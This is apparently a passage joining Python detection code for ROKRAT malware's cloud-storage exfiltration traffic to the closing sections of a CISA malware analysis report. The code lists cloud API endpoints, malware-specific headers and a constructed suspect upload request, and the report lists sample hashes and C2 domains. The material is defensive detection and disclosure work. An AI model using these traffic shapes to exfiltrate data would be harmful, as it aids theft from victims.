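    ("dropbox", "upload", "content.dropboxapi.com", "/2/files/upload"),
    ("dropbox", "download", "content.dropboxapi.com", "/2/files/download"),
    ("pcloud", "token", "api.pcloud.com", "/oauth2_token"),
    ("pcloud", "upload", "api.pcloud.com", "/uploadfile"),
    ("pcloud", "download", "api.pcloud.com", "/getfilelink"),
    ("pcloud", "delete", "api.pcloud.com", "/deletefile"),
    ("yandex", "upload", "cloud-api.yandex.net", "/v1/disk/resources/upload"),
    ("yandex", "download", "cloud-api.yandex.net", "/v1/disk/resources/download"),
    ("yandex", "delete", "cloud-api.yandex.net", "/v1/disk/resources"),
], key=lambda e: -len(e[3]))

# Markers specific to this ROKRAT variant's HTTP traffic (from the strings above).
ROKRAT_BOUNDARIES = {"--opxer--", "--wwjaughalvncjwiajs--"}
ROKRAT_PART_TYPES = {"video/dat", "voice/mp3"}
ROKRAT_USER_AGENT = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
                     "(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36")


def match_endpoint(host, path):
    """(provider, role) for a known cloud endpoint, else None."""
    for provider, role, ep_host, prefix in ENDPOINTS:
        if host == ep_host and path.startswith(prefix):
            return provider, role
    return None


def strings_profile(strings):
    """Map a binary's string dump to the cloud (provider, role) pairs it references."""
    found = set()
    for s in strings:
        if s.startswith("http"):
            u = urlsplit(s)
            hit = match_endpoint(u.hostname or "", u.path)
            if hit:
                found.add(hit)
    return found


def classify_request(req):
    """Score one request (dict: method, host, path, headers, body). A cloud
    endpoint alone is ordinary user traffic; it alerts only when a
    variant-specific marker is present as well."""
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    body = req.get("body", "")
    reasons = []
    endpoint = match_endpoint(req["host"], req["path"])
    if endpoint:
        reasons.append("cloud_api:%s:%s" % endpoint)
    ctype = headers.get("content-type", "")
    if "boundary=" in ctype:
        boundary = ctype.split("boundary=", 1)[1].split(";")[0].strip()
        if boundary in ROKRAT_BOUNDARIES:
            reasons.append("rokrat_boundary")
    if any(("Content-Type: " + t) in body for t in ROKRAT_PART_TYPES):
        reasons.append("rokrat_part_content_type")
    if headers.get("user-agent") == ROKRAT_USER_AGENT:
        reasons.append("rokrat_user_agent")
    if '"mode":{".tag":"overwrite"}' in headers.get("dropbox-api-arg", ""):
        reasons.append("dropbox_overwrite_arg")
    specific = [r for r in reasons if not r.startswith("cloud_api")]
    return {"endpoint": endpoint, "reasons": reasons, "alert": bool(endpoint and specific)}


# Constructed samples. SAMPLE_STRINGS repeats a few strings from the report;
# the two requests only imitate the shapes the strings imply.
SAMPLE_STRINGS = [
    "https://upload.box.com/api/2.0/files/content",
    "https://content.dropboxapi.com/2/files/upload",
    "https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1",
    "https://cloud-api.yandex.net/v1/disk/resources/download?path=%s",
    "Content-Type: video/dat",
]
SUSPECT_REQUEST = {
    "method": "POST", "host": "upload.box.com", "path": "/api/2.0/files/content",
    "headers": {"User-Agent": ROKRAT_USER_AGENT,
                "Content-Type": "multipart/form-data;boundary=--opxer--"},
    "body": ('----opxer--\r\nContent-Disposition: form-data; name="attributes"\r\n\r\n'
             '{"name":"x.dat", "parent":{"id":"0"}}\r\n----opxer--\r\n'
             'Content-Disposition: form-data; name="file"; filename="x.dat"\r\n'
             "Content-Type: video/dat\r\n\r\n..."),
}
BENIGN_REQUEST = {  # an ordinary desktop sync client (constructed user agent)
    "method": "POST", "host": "content.dropboxapi.com", "path": "/2/files/upload",
    "headers": {"User-Agent": "ExampleSyncClient/1.0",
                "Content-Type": "application/octet-stream",
                "Dropbox-API-Arg": '{"path":"/notes.txt","mode":"add"}'},
    "body": "hello",
}
```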


RELATIONSHIP SUMMARY

3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
851b7b044c... Connected_To www.korea-tax.info
www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
fec71b8479... Connected_To www.1588-2040.co.kr
www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd


RECOMMENDATIONS

CISA recommends that users and administrators consider using the following best
practices to strengthen the security posture of their organization's systems.
Any configuration changes should be reviewed by system owners and administrators
prior to implementation to avoid unwanted impacts.

 * Maintain up-to-date antivirus signatures and engines.
 * Keep operating system patches up-to-date.
 * Disable File and Printer sharing services. If these services are required,
   use strong passwords or Active Directory authentication.
 * Restrict users' ability (permissions) to install and run unwanted software
   applications. Do not add users to the local administrators group unless
   required.
 * Enforce a strong password policy and implement regular password changes.
 * Exercise caution when opening e-mail attachments even if the attachment is
   expected and the sender appears to be known.
 * Enable a personal firewall on agency workstations, configured to deny
   unsolicited connection requests.
 * Disable unnecessary services on agency workstations and servers.
 * Scan for and remove suspicious e-mail attachments; ensure the scanned
   attachment is its "true file type" (i.e., the extension matches the file
   header).
 * Monitor users' web browsing habits; restrict access to sites with unfavorable
   content.
 * Exercise caution when using removable media (e.g., USB thumb drives, external
   drives, CDs, etc.).
 * Scan all software downloaded from the Internet prior to executing.
 * Maintain situational awareness of the latest threats and implement
   appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found
in National Institute of Standards and Technology (NIST) Special Publication
800-83, "Guide to Malware Incident Prevention & Handling for Desktops and
Laptops".


CONTACT INFORMATION

 * 1-888-282-0870
 * NCCICCustomerService@us-cert.gov (UNCLASS)
 * us-cert@dhs.sgov.gov (SIPRNET)
 * us-cert@dhs.ic.gov (JWICS)

CISA continuously strives to improve its products and services. You can help by
answering a very short series of questions about this product at the following
URL: https://us-cert.gov/forms/feedback/


DOCUMENT FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide
organizations with malware analysis in a timely manner. In most instances this
report will provide initial indicators for computer and network defense. To
request additional analysis, please contact CISA and provide information
regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide
organizations with more detailed malware analysis acquired via manual reverse
engineering. To request additional analysis, please contact CISA and provide
information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by
recipients. All comments or questions related to this document should be
directed to CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three
methods:

 * Web: https://malware.us-cert.gov
 * E-Mail: submit@malware.us-cert.gov
 * FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity
incidents, possible malicious code, software vulnerabilities, and
phishing-related scams. Reporting forms can be found on CISA's homepage at
www.us-cert.gov.


REVISIONS

May 12, 2020: Initial version

This product is provided subject to this Notification and this Privacy &
Use policy.
